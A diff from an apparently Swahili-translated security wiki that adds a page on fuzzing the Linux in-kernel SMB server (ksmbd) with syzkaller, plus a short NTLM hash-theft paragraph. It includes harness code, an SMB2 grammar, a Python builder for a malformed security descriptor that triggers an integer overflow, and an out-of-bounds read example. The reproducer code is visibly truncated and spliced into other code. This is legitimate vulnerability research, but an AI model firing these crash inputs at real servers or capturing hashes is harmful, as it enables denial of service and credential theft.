Ambazo zinatumika na baadhi ya vivinjari na zana (kama Skype) ## NTLM Theft -Kama vile SMB Trapping, kupanda faili zenye madhara kwenye mfumo wa lengwa (kupitia SMB, kwa mfano) kunaweza kusababisha jaribio la uthibitishaji wa SMB, kuruhusu hash ya NetNTLMv2 kukamatwa kwa zana kama Responder. Hash hiyo inaweza kisha kufichuliwa nje ya mtandao au kutumika katika [SMB relay attack](#smb-relay-attack). +Kama kwa SMB Trapping, kuwekea faili zenye madhara kwenye target system (via SMB, for example) kunaweza kusababisha jaribio la SMB authentication, likiaruhusu NetNTLMv2 hash kukamatwa na zana kama Responder. Hash inaweza kisha kuvunjwa offline au kutumika katika [SMB relay attack](#smb-relay-attack). [See: ntlm_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft) diff --git a/src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md b/src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md new file mode 100644 index 000000000..b1872af81 --- /dev/null +++ b/src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md @@ -0,0 +1,219 @@ +# ksmbd Attack Surface & SMB2/SMB3 Protocol Fuzzing (syzkaller) + +{{#include ../../banners/hacktricks-training.md}} + +## Overview +Ukurasa huu unaelezea mbinu za vitendo za kutumia na kufuzz Linux in-kernel SMB server (ksmbd) kwa kutumia syzkaller. Unalenga kupanua attack surface ya protocol kupitia usanidi, kujenga harness ya stateful inayoweza kuunganisha operesheni za SMB2, kuzalisha PDUs zenye sarufi sahihi, kuelekeza mutations kwenye njia za msimbo zenye coverage dhaifu, na kutumia vipengele vya syzkaller kama focus_areas na ANYBLOB. Wakati utafiti wa awali ulitaja CVE maalum, hapa tunasisitiza metodolojia inayoweza kutumika tena na snippet za konkret ambazo unaweza kuiga kwa setup zako. + +Target scope: SMB2/SMB3 over TCP. Kerberos na RDMA zimetengwa kwa makusudi ili kuweka harness iwe rahisi. + +--- + +## Expand ksmbd Attack Surface via Configuration +Kwa default, setup minimal ya ksmbd inabakia ikiacha sehemu kubwa za server zisijapimwa. Washa vipengele vifuatavyo ili kuendesha server kupitia parsers/handlers zaidi na kufikia njia za msimbo za ndani: + +- Global-level +- Durable handles +- Server multi-channel +- SMB2 leases +- Per-share-level +- Oplocks (on by default) +- VFS objects + +Kuwaweka hivi huongeza utekelezaji katika moduli kama: +- smb2pdu.c (command parsing/dispatch) +- ndr.c (NDR encode/decode) +- oplock.c (oplock request/break) +- smbacl.c (ACL parsing/enforcement) +- vfs.c (VFS ops) +- vfs_cache.c (lookup cache) + +Vidokezo +- Chaguo halisi zinategemea userspace ya ksmbd ya distro yako (ksmbd-tools). Kagua /etc/ksmbd/ksmbd.conf na sehemu za per-share ili kuanzisha durable handles, leases, oplocks na VFS objects. +- Multi-channel na durable handles hubadilisha state machines na lifetimes, mara nyingi kuibua UAF/refcount/OOB bugs chini ya concurrency. + +--- + +## Authentication and Rate-Limiting Adjustments for Fuzzing +SMB3 inahitaji session halali. Kutekeleza Kerberos katika harness hukongeza ugumu, kwa hiyo penda kutumia NTLM/guest kwa fuzzing: + +- Ruhusu guest access na weka map to guest = bad user ili watumiaji wasiojulikana warejewe kwa GUEST. +- Kubali NTLMv2 (tengeneza patch policy ikiwa imezimwa). Hii inafanya handshake iwe rahisi wakati ikifanya exercise code paths za SMB3. +- Ondoa ukaguzi mkali wa credit wakati wa majaribio (post-hardening kwa CVE-2024-50285 ilifanya simultaneous-op crediting kuwa mkali zaidi). Vinginevyo, rate-limits zinaweza kukataa mfululizo wa fuzzed mapema sana. +- Ongeza max connections (mfano, hadi 65536) ili kuepuka kukataliwa mapema wakati wa fuzzing yenye throughput kubwa. + +Tahadhari: Taa marekebisho haya ni kwa ajili ya kuwezesha fuzzing pekee. Usitengeneze deployment na mipangilio hii kwenye uzalishaji. + +--- + +## Stateful Harness: Extract Resources and Chain Requests +SMB ni stateful: maombi mengi yanategemea identifiers zinazorejeshwa na majibu ya awali (SessionId, TreeID, FileID pairs). Harness yako lazima iparse majibu na itumie IDs ndani ya programu ile ile ili kufikia handlers za ndani (mfano, smb2_create → smb2_ioctl → smb2_close). + +Example snippet to process a response buffer (skipping the +4B NetBIOS PDU length) and cache IDs: +```c +// process response. does not contain +4B PDU length +void process_buffer(int msg_no, const char *buffer, size_t received) { +uint16_t cmd_rsp = u16((const uint8_t *)(buffer + CMD_OFFSET)); +switch (cmd_rsp) { +case SMB2_TREE_CONNECT: +if (received >= TREE_ID_OFFSET + sizeof(uint32_t)) +tree_id = u32((const uint8_t *)(buffer + TREE_ID_OFFSET)); +break; +case SMB2_SESS_SETUP: +// first session setup response carries session_id +if (msg_no == 0x01 && received >= SESSION_ID_OFFSET + sizeof(uint64_t)) +session_id = u64((const uint8_t *)(buffer + SESSION_ID_OFFSET)); +break; +case SMB2_CREATE: +if (received >= CREATE_VFID_OFFSET + sizeof(uint64_t)) { +persistent_file_id = u64((const uint8_t *)(buffer + CREATE_PFID_OFFSET)); +volatile_file_id = u64((const uint8_t *)(buffer + CREATE_VFID_OFFSET)); +} +break; +default: +break; +} +} +``` +Vidokezo +- Weka mchakato mmoja wa fuzzer unaoshirikia authentication/state: utulivu na coverage bora na ksmbd’s global/session tables. syzkaller bado huingiza concurrency kwa kuashiria ops async, na rerun ndani. +- reset_acc_state ya majaribio ya Syzkaller inaweza kureset global state lakini inaweza kusababisha slowdown kubwa. Pendelea utulivu na kuzingatia fuzzing badala yake. + +--- + +## Grammar-Driven SMB2 Generation (Valid PDUs) +Tafsiri miundo ya SMB2 kutoka Microsoft Open Specifications kuwa sarufi ya fuzzer ili generator yako itengeneze PDUs halali kimuundo, ambazo zinawafikia dispatchers na IOCTL handlers kwa mfumo. + +Mfano (SMB2 IOCTL request): +``` +smb2_ioctl_req { +Header_Prefix SMB2Header_Prefix +Command const[0xb, int16] +Header_Suffix SMB2Header_Suffix +StructureSize const[57, int16] +Reserved const[0, int16] +CtlCode union_control_codes +PersistentFileId const[0x4, int64] +VolatileFileId const[0x0, int64] +InputOffset offsetof[Input, int32] +InputCount bytesize[Input, int32] +MaxInputResponse const[65536, int32] +OutputOffset offsetof[Output, int32] +OutputCount len[Output, int32] +MaxOutputResponse const[65536, int32] +Flags int32[0:1] +Reserved2 const[0, int32] +Input array[int8] +Output array[int8] +} [packed] +``` +Mtindo huu unalazimisha structure sizes/offsets sahihi na huboresha kwa kiasi kikubwa coverage ikilinganishwa na blind mutation. + +--- + +## Directed Fuzzing With focus_areas +Tumia syzkaller’s experimental focus_areas kuipa uzito zaidi functions/files maalum ambazo kwa sasa zina coverage dhaifu. Mfano wa JSON: +```json +{ +"focus_areas": [ +{"filter": {"functions": ["smb_check_perm_dacl"]}, "weight": 20.0}, +{"filter": {"files": ["^fs/smb/server/"]}, "weight": 2.0}, +{"weight": 1.0} +] +} +``` +Hii husaidia kujenga ACLs halali ambazo zinafikia arithmetic/overflow paths katika smbacl.c. Kwa mfano, Security Descriptor mbaya yenye dacloffset kubwa kupita kiasi husababisha integer-overflow. + +Mjenzi wa reproducer (minimal Python): +```python +def build_sd(): +import struct +sd = bytearray(0x14) +sd[0x00] = 0x00; sd[0x01] = 0x00 +struct.pack_into(' packets.json +``` + +```python +import json, os +os.makedirs("corpus", exist_ok=True) + +with open("packets.json") as f: +data = json.load(f) +# adjust indexing to your tshark JSON structure +packets = [e["_source"]["layers"]["tcp.payload"] for e in data] + +for i, pkt in enumerate(packets): +pdu = pkt[0] +pdu_size = len(pdu) // 2 # hex string length → bytes +with open(f"corpus/packet_{i:03d}.txt", "w") as f: +f.write( +f"syz_ksmbd_send_req(&(&(0x7f0000000340))=ANY=[@ANYBLOB=\"{pdu}\"], {hex(pdu_size)}, 0x0, 0x0)" +) +``` +Hii inaanzisha uchunguzi kwa haraka na inaweza kusababisha mara moja UAFs (mfano, katika ksmbd_sessions_deregister) huku ikiongezea coverage kwa asilimia chache. + +--- + +## Sanitizers: Zaidi ya KASAN +- KASAN bado ni chombo kuu cha kugundua heap bugs (UAF/OOB). +- KCSAN mara nyingi hutoa false positives au low-severity data races kwa lengo hili. +- UBSAN/KUBSAN zinaweza kugundua makosa ya declared-bounds ambayo KASAN hupoteza kutokana na semantiki za index za array. Mfano: +```c +id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]); +struct smb_sid { +__u8 revision; __u8 num_subauth; __u8 authority[NUM_AUTHS]; +__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */ +} __attribute__((packed)); +``` +Kuweka num_subauth = 0 husababisha in-struct OOB read ya sub_auth[-1], inayogunduliwa na UBSAN’s declared-bounds checks. + +--- + +## Vidokezo kuhusu Throughput na Parallelism +- Mchakato mmoja wa fuzzer (shared auth/state) huwa imara zaidi kwa ksmbd na bado huibua races/UAFs shukrani kwa syzkaller’s internal async executor. +- Kwa VM nyingi, bado unaweza kufikia mamia ya amri za SMB/sekunde kwa ujumla. Coverage ya ngazi ya function takriban ~60% ya fs/smb/server na ~70% ya smb2pdu.c inapatikana, ingawa coverage ya state-transition haionyeshwi ipasavyo na metriksi hizi. + +--- + +## Orodha ya Kivitendo +- Washa durable handles, leases, multi-channel, oplocks, na VFS objects katika ksmbd. +- Ruhusu guest na map-to-guest; kubali NTLMv2. Patch out credit limits na ongeza max connections kwa utulivu wa fuzzer. +- Jenga stateful harness inayohifadhi SessionId/TreeID/FileIDs na kuunganisha create → ioctl → close. +- Tumia grammar kwa SMB2 PDUs ili kudumisha uhalali wa muundo. +- Tumia focus_areas kuwekeza zaidi kwenye functions zenye coverage dhaifu (mifano, smbacl.c njia kama smb_check_perm_dacl). +- Changanya na ANYBLOB kutoka kwenye pcaps halisi kuvunja plateaus; pakia seeds na syz-db kwa matumizi tena. +- Endesha kwa KASAN + UBSAN; fanyia triage kwa uangalifu ripoti za UBSAN declared-bounds. + +--- + +## Marejeo +- Doyensec – ksmbd Fuzzing (Part 2): https://blog.doyensec.com/2025/09/02/ksmbd-2.html +- syzkaller: https://github.com/google/syzkaller +- ANYBLOB/anyTypes (commit 9fe8aa4): https://github.com/google/syzkaller/commit/9fe8aa4 +- Async executor change (commit fd8caa5): https://github.com/google/syzkaller/commit/fd8caa5 +- syz-db: https://github.com/google/syzkaller/tree/master/tools/syz-db +- KASAN: https://docs.kernel.org/dev-tools/kasan.html +- UBSAN/KUBSAN: https://docs.kernel.org/dev-tools/ubsan.html +- KCSAN: https://docs.kernel.org/dev-tools/kcsan.html +- Microsoft Open Specifications (SMB): https://learn.microsoft.com/openspecs/ +- Wireshark Sample Captures: https://wiki.wireshark.org/SampleCaptures +- Usomaji wa nyongeza: pwning.tech “Tickling ksmbd: fuzzing SMB in the Linux kernel”; Dongliang Mu’s syzkaller notes + +{{#include ../../banners/hacktricks-training.md}}